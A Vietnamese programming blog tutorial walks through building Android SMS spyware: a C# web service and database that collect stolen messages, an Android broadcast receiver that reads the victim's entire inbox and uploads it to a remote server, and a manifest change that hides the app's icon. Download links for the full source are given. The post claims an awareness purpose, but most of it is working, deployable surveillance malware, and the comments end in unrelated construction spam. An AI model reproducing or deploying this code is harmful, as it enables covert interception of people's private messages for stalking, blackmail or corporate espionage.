Bài 57: Xây dựng phần mềm nghe trộm Tin Nhắn trong Android

[polldaddy poll=9764234]

Hiện nay có rất nhiều phần mềm cài cắm sẵn những đoạn mã có thể nghe lén được thông tin của người sử dụng. Nhưng thường người sử dụng lại ít khi quan tâm, nó thực sự nguy hiểm.

Tui dám chắc nếu như các bạn tải phần mềm từ store hay từ đâu đó về cài vào máy thì bạn chả thèm đọc những thông số cấu hình cũng như yêu chức năng nào đó… bạn cứ thế phang từ đầu chí cuối : Next, next, … and finish…. và kết thúc luôn cuộc sống riêng tư của bạn….

Trong bài viết này Tui muốn demo một phần mềm chạy ngầm nho nhỏ về việc Nghe Trộm Tin Nhắn trong Android, để mọi người cẩn thận khi tải các phần mềm miễn phí có tương tác SMS, internet…. tránh được những rắc rối về sau. Các bạn không được áp dụng nó để cài cắm hay theo dõi ai, vì mục đích của Tui là muốn demo việc cài cắm phần mềm nghe lén nó dễ dàng như thế nào và mọi tin nhắn ta bị người khác đọc hết ra sao… để ta cẩn trọng hơn chứ không phải áp dụng vào việc nghe lén người khác. Nếu bạn nào có ý định viết coding nghe lén ai đó thì xin đừng vào blog này để học.

Tui sẽ đưa ra mô hình cũng như cách thức hoạt động của phần mềm Spyware SMS này như sau:

android_57_2

Mô hình trên Tui đánh thứ tự từ 1->4:

Số 1: Là bất kỳ một điện thoại nào đó muốn gửi tin nhắn cho số 2.

Số 2: Là nạn nhân đang bị cài phần mềm gián điệp nghe lén SMS. Phần mềm này có thể sử dụng nhiều chiêu thức, ở đây Tui ví dụ sử dụng BroadCast Receiver để tự động bắt gói tin SMS và sau đó gửi lên SERVER SPYWARE thông qua Web service.

 Số 3: Là Server SPYWARE do ai đó có ý đồ xây dựng để nhận thông tin gửi về từ phần mềm gián điệp sau đó nó sẽ lưu vào cơ sở dữ liệu (số 4) để phục vụ cho các ý đồ không tốt khác.

Số 4: Là Cơ sở dữ liệu được họ xây dựng để lưu lại toàn bộ thông tin trao đổi giữa nạn nhận với các đối tác, họ lưu vào CSDL để phục vụ cho các ý đồ theo sau đó như: Bán thông tin cho Công ty đối thủ, quấy rối, Tống tiền cũng như các mục đích xấu khác ….

Nếu như bạn chỉ là một người dân bình thường, mọi tin nhắn là vô thưởng vô phạt… ví dụ như “Em ăn cơm chưa”, “Em ngủ chưa”, “Em còn sống hay nhăn răng rồi…”, “Em làm gì kệ xác em chứ…” thì chả có ý nghĩa gì với phần mềm gián điệp. Nhưng Tui giả sử bạn là một người của CÔNG CHÚNG (một ca sĩ nổi tiếng, một MC truyền hình nổi tiếng, 1 chính trị gia xuất chúng)., hay một Tổng giám đốc một công ty lớn… Mọi trao đổi thông tin của bạn với đối tác, với người hâm mộ… Nếu như bị người xấu biết được thì làm sao nhỉ? chết chắc chứ con gì…. Giả sử bạn là 1 Giám Đốc, bạn có tin nhắn của Đối Tác cần ký một hợp đồng quan trọng… tự nhiên bị Đối Thủ biết được thì sẽ như thế nào? Phá sản ư? có thể đấy chứ….. Hay là “các” bà Vợ của bạn thường hay nghi ngờ bạn lăng nhăng, họ ngấm ngầm cài phần mềm gián điệp để theo dõi bạn, nếu biết bạn đang có âm mưu lừa ai đó …. Tui nghĩ để Vợ biết được chắc bạn phải học Tịnh Tà Kiếm Phổ suốt đời.

———————————————————————

Sau đây là các bước tiến hành:

– Chú ý CSDL và Web project bạn cấu hình trên somee.com để test (hoặc nếu bạn có Host riêng thì tự làm trên Host của bạn). Cách sử dụng somee.com bạn xem lại các bài hướng dẫn trước (phần Webservice).

1) Xây dựng CSDL với tên dbSpywareSMSApp:

android_57_6Ở đây Tui tạo 2 bảng đơn giản:

– Bảng Account nhằm mục đích đăng nhập hệ thống để quản lý các tin nhắn SMS Spyware gửi về: Gồm có user name và mật khẩu (dĩ nhiên Tui chưa có băm mật khẩu, bạn tự viết coding băm)

– Bảng SMSSpyware, nó có 3 cột. Tui để phonenumber và timestamp (thời gian nhận tin) làm khóa chính. body là nội dung tin nhắn.

2) Xây dựng Web project (SpywareSMSServerApp):

android_57_7– dbSpywareSMSApp.dbml: Bạn kéo LINQ để sử dụng (xem lại các bài hướng dẫn trước):

android_57_8Mở cửa sổ Server Explorer trong Visual Studio/ chọn biểu tượng Connect/ kết nối CSDL mong muốn/ rồi kéo thả vào như hình trên.

SmsExtraInfo: Lớp đặc tả lại cho tin nhắn SMS vì do timestamp được nhận là kiểu long, ở đây ta sửa lại cho nó ra ngày tháng năm theo định dạng nào đó (chuỗi)

WebService1.asmx: Web service cung cấp 2 dịch vụ:

+ public bool LuuSmsChomDuoc(string phoneNumber, string timeStamp, string body)

–> dịch vụ này dùng để cho phần mềm gián điệp đọc thông tin SMS và gửi lên SERVER SPYWARE–> đẩy xuống CSDL

+  public SmsExtraInfo[] DocToanBoTinNhanChomDuoc()

–> Dịch vụ này truy vấn toàn bộ SMS đọc tự CSDL do dịch vụ saveSMSSpyWare lưu xuống.

+ Default.aspx: Website hiển thị toàn bộ SMS đọc lén được thông qua dịch vụ DocToanBoTinNhanChomDuoc. chú ý nếu chưa đăng nhập sẽ tự động quay lại trang login.aspx.

+ login.aspx: Trang yêu cầu đăng nhập hệ thống, đăng nhập thành công mới cho vào trang Default.aspx

Chi tiết:

source code SmsExtraInfo:

[code language=”csharp”]

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;

namespace SpywareSMSServerApp
{
[Serializable]
public class SmsExtraInfo
{
public string PhoneNumber { get; set; }
public string TimeStamp { get; set; }
public string Body { get; set; }
}
}

[/code]

Source code WebService1:

[code language=”csharp”]

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Services;

namespace SpywareSMSServerApp
{
    /// <summary>
    /// Summary description for WebService1
    /// </summary>
    [WebService(Namespace = "http://tranduythanh.com/")]
    [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
    [System.ComponentModel.ToolboxItem(false)]
    // To allow this Web Service to be called from script, using ASP.NET AJAX, uncomment the following line.
    // [System.Web.Script.Services.ScriptService]
    public class WebService1 : System.Web.Services.WebService
    {

        [WebMethod]
        public string HelloWorld()
        {
            return "Hello World";
        }
        [WebMethod]
        public bool LuuSmsChomDuoc
            (string phoneNumber, string timeStamp, string body)
        {
            dbSpywareSMSAppDataContext db = new dbSpywareSMSAppDataContext();
            SMSSpyware smsChom = db.SMSSpywares.
                FirstOrDefault(x => x.phonenumber == phoneNumber
                    && x.timestamp == timeStamp);
            //nếu tin này =null thì ta mới lưu
            //bằng null tức là chưa tồn tại trong SERVER SPYWARE
            if (smsChom == null)
            {
                try
                {
                    smsChom = new SMSSpyware();
                    smsChom.phonenumber = phoneNumber;
                    smsChom.timestamp = timeStamp;
                    smsChom.body = body;
                    db.SMSSpywares.InsertOnSubmit(smsChom);
                    db.SubmitChanges();
                    return true;
                }
                catch
                {

                }
            }
            return false;
        }
        //hàm chuyển timestamp trong java qua .net
        public static DateTime JavaTimeStampToDateTime(double javaTimeStamp)
        {
            // Java timestamp is millisecods past epoch
            System.DateTime dtDateTime = new DateTime(1970, 1, 1, 0, 0, 0, 0, System.DateTimeKind.Utc);
            dtDateTime = dtDateTime.AddSeconds(Math.Round(javaTimeStamp / 1000)).ToLocalTime();
            return dtDateTime;
        }
        [WebMethod]
        public SmsExtraInfo[] DocToanBoTinNhanChomDuoc()

        {

            dbSpywareSMSAppDataContext db = new dbSpywareSMSAppDataContext();
            List<SMSSpyware> dsSMS = db.SMSSpywares.ToList();
            List<SmsExtraInfo> dsDisplay = new List<SmsExtraInfo>();
            foreach (SMSSpyware sms in dsSMS)
            {
                SmsExtraInfo infor = new SmsExtraInfo();
                infor.Body = sms.body;
                long l=long.Parse(sms.timestamp);
                DateTime d = JavaTimeStampToDateTime(l);
                infor.TimeStamp = d.ToLongDateString();
                infor.PhoneNumber = sms.phonenumber;
                dsDisplay.Add(infor);

            }
            return dsDisplay.ToArray();
        }
        [WebMethod]
        public Account DangNhap(string userName, string passWord)
        {
            dbSpywareSMSAppDataContext db = new dbSpywareSMSAppDataContext();
            Account ac = db.Accounts.FirstOrDefault
                (x => x.username == userName && x.password == passWord);
            return ac;
        }
    }
}

[/code]

Bạn chú ý ở trên có đoạn coding chuyển TimeStamp từ Android qua DateTime trong asp.net.

Bạn có thể nối thêm ToLongTimeString để nó có đầy đủ giờ phút giây…

infor.TimeStamp = d.ToLongDateString()+”;”+d.ToLongTimeString();

Source Design Default.aspx:

[code language=”html”]
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="SpywareSMSServerApp.Default" %>

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title></title>
    <meta http-equiv="refresh" content="10"/>
</head>
<body>
    <form id="form1" runat="server">
<div>

        Danh sách tin nhắn chôm được:
<asp:GridView ID="GridView1" runat="server">
        </asp:GridView></div>
</form>
</body>
</html>

[/code]

<meta http-equiv="refresh" content="10"/> 
cho phép tự động 10 giây tải lại website 1 lần.

Source coding behind Default.aspx.cs:

[code language=”csharp”]

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;

namespace SpywareSMSServerApp
{
public partial class Default : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
if (Session["AC"] == null)
{

//Chưa đăng nhập thì quay lại login
Response.Redirect("login.aspx");
}
else
{
WebService1 ws=new WebService1();
GridView1.DataSource = ws.DocToanBoTinNhanChomDuoc();
GridView1.DataBind();
}
}
}
}

[/code]

Source design cho màn hình đăng nhập login.aspx:

[code language=”html”]

<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Login.aspx.cs" Inherits="SpywareSMSServerApp.Login" %>

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title></title>
<style type="text/css">
.auto-style1 {
width: 100%;
}
</style>
</head>
<body>
<form id="form1" runat="server">
<table >
<tr>
<td>Tên đăng nhập:</td>
<td>
<asp:TextBox ID="txtUserName" runat="server"></asp:TextBox></td>
</tr>
<tr>
<td>Mật Khẩu:</td>
<td>
<asp:TextBox ID="txtPassword" runat="server" TextMode="Password"></asp:TextBox></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>
<asp:Button ID="btnDangNhap" runat="server" OnClick="btnDangNhap_Click" Text="Đăng nhập" /></td>
</tr>
</table>
<asp:Label ID="lblThongBao" runat="server" ForeColor="Red"></asp:Label>
</form>
</body>
</html>

[/code]

Hình minh họa:

android_57_9Source coding behind xử lý đăng nhập:

[code language=”csharp”]

using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;

namespace SpywareSMSServerApp
{
public partial class Login : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{

}

protected void btnDangNhap_Click(object sender, EventArgs e)
{
WebService1 ws = new WebService1();
Account ac = ws.DangNhap(txtUserName.Text, txtPassword.Text);
if (ac == null)
{
lblThongBao.Text = "Đăng nhập thất bại";
}
else
{
//cần lưu ac đăng nhập vào Session:
Session.Add("AC", ac);
Response.Redirect("Default.aspx");
}
}
}
}

[/code]

Như vậy bạn đã xây dựng xong SERVER SPYWARE và CSDL.

Bạn cấu hình và đưa lên Somee.com thì bạn được kết quả như sau (nếu đăng nhập thành công):

android_57_10Nếu bạn nối thêm ToLongTimeString thì có kết quả như sau (Đầy đủ giờ phút giây…):

android_57_11Các bước đưa lên Somee.com bạn phải tự xem lại các bài hướng dẫn trước rất chi tiết.

Source code bạn tải ở đây:

Source SQL Server: http://www.mediafire.com/download/1deekpd7r59sv6w/dbSpywareSMSApp.sql

Tui để sẵn dòng insert account, bạn sửa lại rồi chạy script trên Somee.com để tạo CSDL

Source Web Project: http://www.mediafire.com/download/aj3e64fqjq60cf5/SpywareSMSServerApp.rar

Bạn nhớ sửa lại web.config cho đúng cấu hình với chuỗi kết nối của bạn.

Cấu hình thành công bạn sẽ được mô tả webservice như của Tui như link sau:

http://duythanhit.somee.com/webservice1.asmx?WSDL

*** Tiếp theo xây dựng phần mềm Gián điệp client, tên là SpywareSMSApp với cấu trúc như sau:

android_57_5Giải thích:

SmsInfo : Lớp tạo một tin nhắn SMS để phục vụ cho SpywareTask SpywareSmsReceiver

SpywareSmsReceiver: Lớp tự động lắng nghe tin nhắn gửi tới và đọc thông tin tin nhắn, đóng gói thành lớp SmsInfo rồi gửi gói này cho SpywareTask.

SpywareTask : Là lớp chạy đa tiến trình, nhiệm vụ là nhận gói tin SmsInfo do SpywareSmsReceiver gửi qua, nhận được gói tin xong nó sẽ gửi lên SERVER SPYWARE thông qua Web Service.

Chú ý là phần mềm sau khi được cài đặt vào máy nạn nhân nó sẽ tự động lắng nghe tin SMS gửi tới, cho dùng nạn nhân không kích hoạt phần mềm.

source code của SmsInfo:

[code language=”java”]

package tranduythanh.com.spywaresmsapp;

public class SmsInfo {
private String phoneNumber;
private String timeStamp;
private String body;
public String getPhoneNumber() {
return phoneNumber;
}
public void setPhoneNumber(String phoneNumber) {
this.phoneNumber = phoneNumber;
}
public String getTimeStamp() {
return timeStamp;
}
public void setTimeStamp(String timeStamp) {
this.timeStamp = timeStamp;
}
public String getBody() {
return body;
}
public void setBody(String body) {
this.body = body;
}

}

[/code]

Tiếp theo là coding lớp SpywareSmsReceiver  (lớp tự lắng nghe tin nhắn gửi tới và gửi gói tin qua SypeWare task):

[code language=”java”]

package tranduythanh.com.spywaresmsapp;

import android.content.BroadcastReceiver;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.net.ConnectivityManager;
import android.net.NetworkInfo;
import android.net.Uri;
import android.os.SystemClock;
import android.widget.Toast;

public class SpywareSmsReceiver extends BroadcastReceiver {
/**
* Hàm kiểm tra xem thiết bị của máy nạn nhân có đang
* kết nối internet hay ko?
* @param context
* @return
*/
public boolean isConnect(Context context)
{
ConnectivityManager cm =
(ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE);
NetworkInfo netInfo = cm.getActiveNetworkInfo();
boolean b= netInfo != null && netInfo.isConnectedOrConnecting();
return b;
}
public void onReceive(Context context, Intent intent) {
if(isConnect(context))
{
try
{
processReadAllSMSInInbox(context);
}
catch(Exception ex)
{
Toast.makeText(context,ex.toString(), Toast.LENGTH_LONG).show();
}
}
else
{
Toast.makeText(context, "No internet", Toast.LENGTH_LONG).show();
}
}
/**
* xử lý đọc toàn bộ tin nhắn trong inbox
* mục đích là giết lầm hơn bỏ sót…
* vì có thể trước thời điểm cài phần mềm Spyware
* đã có nhiều tin nhắn, nên ta đọc hết
* @param context
*/
public void processReadAllSMSInInbox(Context context)
{
ContentResolver contentResolver =
context.getContentResolver();
Cursor cursor = contentResolver.query(
Uri.parse("content://sms/inbox"),
null, null, null, null
);

int indexPhoneNumber = cursor.getColumnIndex("address");
int indexTimeStamp = cursor.getColumnIndex("date");
int indexBody = cursor.getColumnIndex("body");
if ( indexBody < 0 || !cursor.moveToFirst() )
return;
do{
String phonenumber=cursor.getString( indexPhoneNumber );
String timeStamp=cursor.getString(indexTimeStamp);
String body= cursor.getString( indexBody );
SmsInfo smsInfor=new  SmsInfo();
smsInfor.setBody(body);
smsInfor.setPhoneNumber(phonenumber);
smsInfor.setTimeStamp(timeStamp);
//mỗi lần đọc được 1 tin nhắn thì đưa vào tiểu trình
//để đẩy lên server spyware
SpywareTask task=new SpywareTask();
task.execute(smsInfor);
SystemClock.sleep(100);
}
while( cursor.moveToNext() );
}
}

[/code]

– Source code của lớp SpywareTask (tiểu trình để đẩy gói tin lên server spyware):

[code language=”java”]

package tranduythanh.com.spywaresmsapp;

import org.ksoap2.SoapEnvelope;
import org.ksoap2.serialization.SoapObject;
import org.ksoap2.serialization.SoapSerializationEnvelope;
import org.ksoap2.transport.HttpTransportSE;

import android.os.AsyncTask;

public class SpywareTask extends AsyncTask<SmsInfo, Void, Void>{
final String URL="http://duythanhit.somee.com/webservice1.asmx?WSDL";
final String NAMESPACE="http://tranduythanh.com/";
final String METHOD_NAME="LuuSmsChomDuoc";
final String SOAP_ACTION=NAMESPACE+METHOD_NAME;
@Override
protected Void doInBackground(SmsInfo… params) {
try{
SmsInfo sms=params[0];
SoapObject request=new SoapObject(NAMESPACE, METHOD_NAME);
request.addProperty("phoneNumber", sms.getPhoneNumber());
request.addProperty("timeStamp", sms.getTimeStamp());
request.addProperty("body", sms.getBody());
SoapSerializationEnvelope envelope=
new SoapSerializationEnvelope(SoapEnvelope.VER11);
envelope.dotNet=true;
envelope.setOutputSoapObject(request);
HttpTransportSE androidHttpTransport=
new HttpTransportSE(URL);
androidHttpTransport.call(SOAP_ACTION, envelope);
envelope.getResponse();
}
catch(Exception e)    {}
return null;
}
}

[/code]

– Ta không cần viết coding gì hết trong MainActivity

– Tiếp theo để cho ứng dụng có khả năng chạy ngầm và tự động lắng nghe SMS thì ta cấu hình AndroidManifest như sau:

[code language=”xml”]

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="tranduythanh.com.spywaresmsapp"
android:versionCode="1"
android:versionName="1.0" >

<uses-sdk
android:minSdkVersion="14"
android:targetSdkVersion="19" />

<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.WRITE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.INTERNET"/>

<application
android:allowBackup="true"
android:icon="@drawable/ic_launcher"
android:label="@string/app_name"
android:theme="@style/AppTheme" >
<activity
android:name=".MainActivity"
android:label="@string/app_name" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />

<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>

<receiver android:name="tranduythanh.com.spywaresmsapp.SpywareSmsReceiver" >
<intent-filter>
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
</application>

</manifest>

[/code]

– Giải thích:

+<uses-permission android:name=”android.permission.ACCESS_NETWORK_STATE” /> quyền cho phép kiểm tra trạng thái kết nối mạng của thiết bị. Còn các quyền khác bạn đã biết.

+ Từ dòng 32->36:

<receiver android:name=”tranduythanh.com.spywaresmsapp.SpywareSmsReceiver” >
<intent-filter>
<action android:name=”android.provider.Telephony.SMS_RECEIVED” />
</intent-filter>

Cho phép đăng ký SpywareSmsReceiver như là 1 dịch vụ chạy ngầm và nó tự lắng nghe theo android.provider.Telephony.SMS_RECEIVED (tin nhắn tới) được khái báo trong tag intent-filter .

– Như vậy bạn đã hoàn thành xây dựng ứng dụng Gián Điệp, chỉ cần máy nạn nhân cài đặt phần mềm này, khi có kết nối internet nếu có bất kỳ tin nhắn nào gửi tới máy nạn nhân thì bạn đều đọc được hết thông tin trong inbox. Bạn thấy đấy, các phần mềm trên mạng có thể dễ dàng cài phần mềm gián điệp mà bạn không hề để ý… mọi tin của bạn đều có thể bị đọc trộm…nó rất nguy hiểm. Bạn cần biết sự nguy hiểm này thông qua các cách hướng dẫn lập trình ở trên để biết tránh rủi ro chứ không phải dùng với mục đích xấu.

-Bạn có thể tải source client Sms Spyware đầy đủ ở đây:

http://www.mediafire.com/download/qi95v0w63makg5g/SpywareSMSApp.rar

Thường khi chúng ta bị cài phần mềm gián điệp thì không thấy xuất hiện Icon khi cài đặt vào máy, chỉ trong Application Manager mới thấy, do cấu hình đơn giản trong Android Manifest như sau:

<activity
            android:name=”.MainActivity”
            android:label=”@string/app_name” >
            <intent-filter>
                <action android:name=”android.intent.action.MAIN” />

                <category android:name=”android.intent.category.LAUNCHER” />
            </intent-filter>
</activity>

Xóa hết Intent -Filter đi chỉ còn lại:

<activity
            android:name=”.MainActivity”
            android:label=”@string/app_name” >
</activity>

Do đó khi bị cài ngầm vào, nạn nhân thường không biết vì không thấy biểu tưởng phần mềm nào lạ cả. Nhưng nó đã đang chạy ngầm rồi.

– Chúc bạn thành công! và nhớ đừng làm việc gì xấu xa.

21 thoughts on “Bài 57: Xây dựng phần mềm nghe trộm Tin Nhắn trong Android”

 1. Code của thầy cứ mỗi khi receive dc 1 tn là phải đọc hết toàn bộ tin nhắn trong inbox ak thầy, em không hiểu trong đoạn BroadcastReceive thầy viết lắm. Mình chỉ đọc tin nhắn vừa nhận được thôi mà

 2. Thầy ơi cho em hỏi, lúc em làm như thầy thì chỗ code behind của Default thì nó báo WebService1 không tìm thấy, còn code behind của Login thì nó báo txtUserName, txtPassword, lblThongBao không tồn tại trong khi em làm mấy cái đó hết rồi

 3. Hình như bài của thầy có vấn đề, em tải cái source của thầy chạy thử nhưng nó chỉ đọc tin nhắn chứ nó không đẩy tin nhắn lên host

 4. các bạn nên hiểu là 🙂 họ hỏi chứ k fải là tiếp tay nên hiển nhiên là nó chỉ truyền đạt nội dung chứ k chạy dc =]] jmuốn chạy thì cố thêm tý =]]

 5. bạn cần giải pháp xây nhà trọ Việc tiếp theo chính
  là lập dự toán chi phí xây dựng nhà ở để xác định nguồn vốn tài chính mà gia chủ mang đi đầu tư..… Chúng tôi sẽ tư vấn giải pháp giúp bạn tiết kiêm chi phí theo tiêu chuẩn xây dựng nhà ở của
  bộ xây dựng Công ty xây dưng Bước thứ 3 cũng là bước cuối cùng
  trong trình tự xây nhà là thi công và hoàn công.

  Hầu hết việc này được giao cho đơn vị nhà thầu hoàn tất……
  thành phố cà mau những lời nói xuôi tai và chắc như đinh đóng cột nhưng sau đó là khiến bạn mất
  thời gian và tiền bạc do thiếu tính minh bạch và rõ ràng ngay từ lúc
  ký kết.,.… công ty xây dựng uy tín ở tphcm

 6. Bạn đang có kế hoạch xây phòng trọ Việc tiếp theo chính là lập dự toán chi phí xây dựng nhà ở để xác định nguồn vốn tài chính mà gia chủ mang đi
  đầu tư..… Hãy gọi cho chúng tôi để được
  hổ trợ tư vấn giá cả họp lý theo tiêu chuẩn xây dựng nhà ở của bộ xây dựng công ty
  xây dựng hồ hà Bước thứ 3 cũng là bước cuối cùng trong trình tự xây nhà là thi công
  và hoàn công. Hầu hết việc này được giao cho đơn vị nhà thầu hoàn tất……
  HỒ CHÍ MINH những lời nói xuôi tai và chắc
  như đinh đóng cột nhưng sau đó là khiến bạn mất thời gian và tiền bạc do thiếu tính minh bạch và rõ ràng ngay từ lúc ký kết.,
  .… công xây dựng nhà

 7. bạn muốn kinh doanh nhà trọ Việc tiếp theo chính
  là lập dự toán chi phí xây dựng nhà ở để xác định nguồn vốn tài chính mà gia
  chủ mang đi đầu tư..… Hãy gọi cho chúng tôi để được hổ trợ tư vấn giá
  cả họp lý theo tiêu chuẩn xây dựng nhà
  ở của bộ xây dựng xây dưng Nguyên Bước thứ 3 cũng là bước cuối cùng trong trình tự
  xây nhà là thi công và hoàn công. Hầu hết việc
  này được giao cho đơn vị nhà thầu hoàn tất……
  Ba tri những lời nói xuôi tai và chắc như đinh đóng cột nhưng sau
  đó là khiến bạn mất thời gian và tiền bạc do thiếu tính minh bạch và rõ ràng ngay từ lúc ký kết.,.… công ty xây dựng ở tphcm

Leave a Reply